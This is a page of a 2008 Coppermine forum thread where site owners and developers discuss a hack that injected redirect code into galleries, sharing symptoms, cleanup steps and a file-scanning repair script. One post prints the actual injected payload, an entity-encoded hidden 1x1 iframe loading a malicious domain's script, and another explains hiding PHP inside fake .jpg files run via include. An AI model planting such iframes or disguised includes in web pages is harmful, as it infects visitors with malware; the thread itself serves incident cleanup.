Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: 1 ... 8 9 10 11 [12] 13 14 15   Go Down

Author Topic: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?  (Read 322112 times)

0 Members and 1 Guest are viewing this topic.

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #220 on: April 19, 2008, 12:14:52 pm »

The guy who owns the domain may or may not be the creator of the hack. The whois record shows who owns the domain, nothing more, nothing less. You can't prove anything with that - if you sue him, the guy will claim that the hacker has redirected your site to his domain and that he The owner of cdpuvbhfzz.com) was not aware of that. Try to prove him wrong - you can't. The only thing you could actually do is try to figure out how this guy makes a living. Once you figured out, try to alert his business partners of his reputation. If they don't care, you're probably stuck, so the only thing you could probably do are illegal things (DDOS attacks against his server and such stuff), which would bring you on the same level with the moron who performed the attack. This is something I wouldn't even consider. Sometimes, it makes me angry what some people do on the internet, and I would love to visit them and beat them up. But then, this is of course a childish fantasy that would not help at all (and one that would get me into serious troubles), so it's not an option neither.
So what are we going to do against the jerk who triggered the attacks? I'll tell you: nothing. There is nothing we can do. I'm not willing to even think about possible actions against that jerk - he's a low-life moron, an insect, a parasite. I pity him - what a poor method to make a living.

My website has been hacked too. The hacker uploaded somehow "45563131x.jpg" file (this is a php file, not an image!) to the "~/coppermine/albums/userpics/10001" folder.
see my instructions:
  • Zip archives or jpeg files are not harmful by themselves on the server, as they can not be executed on the server (at least if the server is configured properly). This being said, it doesn't hurt if a malevolent user manages to upload a file named "I_am_evil.jpg" to your webserver that actually isn't a jpeg image, but just a plain text PHP-file that contains malicious code that he renamed from I_am_evil.php to I_am_evil.jpg on his client before uploading it. Without the corresponding configuration, such a file can not do harm. However, it's a trick hackers frequently use to disguise their payload files from the eye of the legitimate site owner: if they manage to break your site's security by modifying an existing PHP file, they can inject code into that PHP file that uses PHP's include command to actually execute the code within I_am_evil.jpg.
    Let me give you an example: there is a legitimate PHP file http://your_site.tld/coppermine/upload.php - if an attacker manages to manipulate that file and add a code line like this: include('albums/userpics/100023/picture.jpg'); and then manages to upload the malicious file http://your_site.tld/coppermine/albums/userpics/100023/picture.jpg to your server that actually isn't a jpeg file, but a script file in disguise, the payload contained in that file will be executed. If you manage to sanitize the file http://your_site.tld/coppermine/upload.php (e.g. remove the offending include line), the malicious jpeg file can no longer do harm, so it won't hurt if it is still a leftover from the attack. The same trick can be used by attackers to disguise their payload in all other files that might look innocent (like zip files or similar).
Logged

Marius

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
    • Desktop Wallpapers RO
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #221 on: April 19, 2008, 08:48:38 pm »

Hi all
As many more sites lately, mine was hacked aswell. It was more or less same MO, but seems that i was "lucky" compared to others (no db changes, no hidden php in zips or jpgs), only 3 files was changed from what i have found, displayimage.php, index.php and thumbnails.php, though i 've found in plugins folder a script, i attached it so the devs can find more usefull info on this matter. Hope this helps...

Regards
Logged

Marius

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
    • Desktop Wallpapers RO
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #222 on: April 19, 2008, 08:56:11 pm »

Upss.. forgot to mention: this time domain was other, caatadgouk.com, but still same Ukrtelegroup Ltd that was mention somewhere in this thread...
Code: [Select]
<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#97;&#97;&#116;&#97;&#100;&#103;&#111;&#117;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#52;&#51;&#54;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>
Logged

MrWells

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #223 on: April 19, 2008, 09:47:01 pm »

Shame I missed the script! Would have saved me some work I suspect.

Coppermine and a SMF forum were hit.

I Downloaded the forum to my PC and cleaned it with a rough & ready VB program as no upgrade available.

I upgraded Coppermine to .16 removed zip files etc. and about to go to .18 however....

All of my intermediate pictures appear to have vanished! Replaced with "Click to view full size image" button  :o
The thumbnail and full size image still exist.  I assume it was caused by the hack? Is there a fix for this please?
Logged

MrWells

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #224 on: April 19, 2008, 09:54:09 pm »

PS
Quote
Create intermediate pictures
  is/was set
Logged

MyWebsiteAdviser

  • Coppermine newbie
  • Offline Offline
  • Gender: Male
  • Posts: 6
    • My Website Adviser
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #225 on: April 19, 2008, 09:57:37 pm »

Joachim Müller, thank a lot for your explanation.

Alex Webs.
Logged
Alex Webs,
MyWebsiteAdviser.com

Nibbler

  • Guest
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #226 on: April 19, 2008, 10:11:22 pm »

Check the size of intermediate images in config. The hack sometimes sets it to 1px.
Logged

MrWells

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #227 on: April 20, 2008, 12:06:00 am »

Size still set to 600px

Can I find the pics to see if they exist?
if not can I force them to be created, if they do, how can I reference them?
Logged

Nibbler

  • Guest
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #228 on: April 20, 2008, 12:11:55 am »

Rebuild them in admin tools. If that doesn't work then start a new thread.
Logged

empfl

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Gender: Male
  • Posts: 54
  • cy tha game
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #229 on: April 22, 2008, 08:58:46 pm »


...I attach the file with this post, download and rename it to cure.php, upload to your site & run it.

last update: change some function to make the cure script run successful in more case.


I want to use this script, but sorry it doesn't work.


I get the following message:

"""Parse error: syntax error, unexpected $end in /homepages/xx/yyyyyyyyy/htdocs/cure.php on line 93"""

Logged

severeidaho

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 62
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #230 on: April 22, 2008, 11:32:39 pm »

I read thru most of these Replies.  I first found I had a problem cause my Config for the main page changed dramatically as well as I saw a Zip file in one of my albums.  I deleted this ZIP file, which could have been a PHP file.  My first thought was that someone Bruteforced my Gallery and got my password.  I changed my password only to find that the next day my Main page was out of wack again.  In the "show how many albums, rows, etc everything was changed to "1".  Also after reading these replies I found that my "path to custom header include" was directing to "albums/userpics/10001/45563131x.jpg" which is incorrect as I dont use a custom header that way. 

My gallery is OFFLINE and in Debug mode.  I will be upgrading from 1416 to the latest asap. 

-gerrit
Logged

Nibbler

  • Guest
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #231 on: April 22, 2008, 11:37:09 pm »

Setting it offline won't stop anything, neither will debug mode.
Logged

severeidaho

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 62
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #232 on: April 23, 2008, 12:04:16 am »

Hi Nibbler,   Thanks for letting me know.  I did disable the URI, but because this thread is soo huge I am sure I missed alot of fixes.  Any chance for a Sticky on Precautions to take with this Problem. 

BTW:  Anyone else have problems outside of CPG and forum and blog setups?  I noticed that my Main page also has a Script which is detected with Windows Live one Care as "html exploit". 

I have contacted my Host for help but am also looking for Solutions. 

Thanks...

-gerrit
Logged

Nibbler

  • Guest
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #233 on: April 23, 2008, 12:09:14 am »

There are no precautions. You can use the new copy of bridge/coppermine.inc.php mentioned in the announcement post to patch your gallery though (will probably work on any 1.4.x). The hack that's in the wild will spread to all php/html files you made writeable in your webspace/webserver.
Logged

severeidaho

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 62
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #234 on: April 23, 2008, 03:28:42 am »

Anyone answer whether or not the "Yikes my site has been hacked thread" was posted prior to 1418?  Reason I ask is that I am under the impression that upgrading to this latest release fixes the exploit, yet all other php files on the webhost are still needed to be fixed?  The Exploit alone is only driven thru CPG correct? Thus eliminating Older versions by Upgrading to the latest version will end the Problem, yet infected php pages outside of CPG still need to be cleaned?

Thanks. 


Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #235 on: April 23, 2008, 07:36:23 am »

The "Yikes, I've been hacked! Now what?" thread has been written on 2008-04-15. As it contains reference to cpg1.4.18, it must have been written after the release of cpg1.4.18, don't you agree? The announcement thread for cpg1.4.18 has been written on 2008-04-14.
Anyway, the "Yikes" thread is generic: it explains what you need to do to sanitize your gallery no matter what - it does not only apply for the cdpuvbhfzz.com hack, but for others as well that may come after it and that might exploit the same vulnerability that existed in all cpg1.4.x versions before cpg1.4.18. That's why it doesn't contain reference to the attack pattern of the cdpuvbhfzz.com-hack (the iframes trick) - the pattern (payload) may differ in future exploits of the pre-cpg1.4.18 vulnerability.
Don't believe what non-experts on this thread said or suggested: after all, they are no experts and their suggestions are just speculation. Believe us (the coppermine dev team members, particularly Nibbler, who spotted and fixed the vulnerability).
To make this absolutely clear: there is absolutely nothing that you can do that makes it acceptable to delay the upgrade to cpg1.4.18 and the sanitization discussed in "Yikes". Your gallery will be vulnerable if you don't upgrade, no matter wether you allow URI uploads, no matter if you're the only user on your gallery or not, no matter whether your gallery is public or private, no matter wether you enabled debug_mode, no matter wether you set your gallery to offline mode. The exploit will not play by the rules and respect permissions. It's up to you all (infected or not) to fix your gallery now! I have little sympathy for people who are aware that the hack is in the wild and that their gallery is outdated, yet they fail to upgrade. Repeat: perform the upgrade. Do so now; "now" as in "today", this very moment, immediately.

Joachim
Logged

keithjr

  • Coppermine newbie
  • Offline Offline
  • Posts: 1
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #236 on: April 24, 2008, 01:40:23 am »

Ok i have had this hit my server (not keeping up with updates ftl)... and wrote a script that goes through and corrects all of your files.

step 1) make a text file with the exact text of the code you want removed (those few lines of php code at the bottom of every php page) - call it say badcode.txt. save it on the root of your web server.

step 2) make a php file, say named fixit.php

i threw this as the code:

Code: [Select]
<pre>
Fixit MMMMM


<?php
$badcode 
file_get_contents("badcode.txt");

function 
parse_dir($dir)
{
  global 
$badcode;
  
  if (
$handle opendir($dir)) 
  {
    while (
false !== ($file readdir($handle))) 
    { 
      if (
is_dir($file) == false)
      {
        
$fn explode(".",$file);
        if (
$fn[sizeof($fn)-1] == "php")
        {
          
$filename $dir."/".$file;
          
// good, parse it.
          
print("Attempting fix on $filename ........");
          
$badfile file_get_contents($filename);
          
$isitbad strpos($badfile,$badcode);
          if (
$isitbad == 0)
          {
            print(
"Fix not required.\n");
          }
          else
          {
            
$goodfile str_replace($badcode,"",$badfile);
            if (
file_put_contents($filename,$goodfile))
              print(
"OK<br>");
            else
              print(
"Nope.<br>");
          }
        }
      }
      if ((
$file != ".") and ($file != "..") and is_dir($dir."/".$file))
         
parse_dir($dir."/".$file);
  }
  
closedir($handle); 
  }
}


parse_dir(".");
?>

Run it, and it will tell you what was infected and was able to fix (or not fix), and what was clean.

Hope it helps some other people as it did me.
Logged

severeidaho

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 62
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #237 on: April 24, 2008, 06:19:21 am »

I did not get a chance to use your code (poster above me) as I just spent quite a while going thru my Gallery directory and rest of my website. After Upgrading to 1418 I believe I have eliminated all those Iframe's.  Turns out the Only Files that were messed with were the Ones I left chmod 777.  I also noticed that with FileZilla for the "user" the Files that were messed with were named "nobody" which has been explained to me as a WebApache footprint.  Anyways I just wanted to post what all I did to fix my website. 

First and foremost,  I went thru the "yikes, My website was hacked" thread and followed the advice of Going thru my Albums and making sure there were no "php, html and any other executable files".  I found that in the "userpics" folder there were folders named "10011" etc, each came with an "index.html" or Index.php" in each of these pages the Iframe code was there, I removed the code and moved on.  In the Logs folder under the Gallery root out of 4 pages, 3 had the code, I removed that.  I also found that in the Gallery root the Files named "banner & bannermgr.php" also had the code since they were chmodded 777.  Note that as I am cleaning these files I changing the chmod to 755. 

My CPMFETCH installation was messed with as well from chmod 777.  This is why my main page (non cpg related) also had the code attahed for redirect.  In the cpmfetch folder the file named "cpmfetch_config.php" was messed with.  Best way I can describe it is the code appeared to be Legitamitely calling for an Image like the usual cpmfetch code calls for images.  There was a <php> call and then the code linked to the userpics album in gallery and then named images that I never added and then followed by the iframe code.  This code, if it makes sense to you (the reader) made it possible for any page that used CPMFETCH to allow for the redirect which in turn gave you a trojan unless you had a good anti virus. 

My wordpress installation was safe since the software itself checks for wrong chmods, etc.  I still upgraded to the latest build to prevent this from happening again. 

By the way,  If you find that You cant delete a file with ftp due to 553 permission denied.  Just contact your Host and they will fix it.  You can also run a cgi script to Fix the user to yourself as the user "nobody" which created the files doesnt allow you as an admin to chmod or delete or even edit for that matter. 

I truly hope I didnt leave anything out and hope this info helps you to clean your Online website and files. 

-gerrit

Logged

Ralf Night

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 77
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #238 on: April 24, 2008, 05:04:19 pm »

It touched me too, what i have to do? Is there any answer or menagament just tell: Upgrade your gallery, change your password etc?
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #239 on: April 24, 2008, 05:06:38 pm »

There is an entire thread that you're replying to that you don't read, but reply anyway? There is a sanitization thread that has been mentioned countless times already. Do as suggested in that thread. You have a notorious record of not respecting board rules; do us all a favor and just respect them now, will you?
Logged
Pages: 1 ... 8 9 10 11 [12] 13 14 15   Go Up
 

Page created in 0.037 seconds with 21 queries.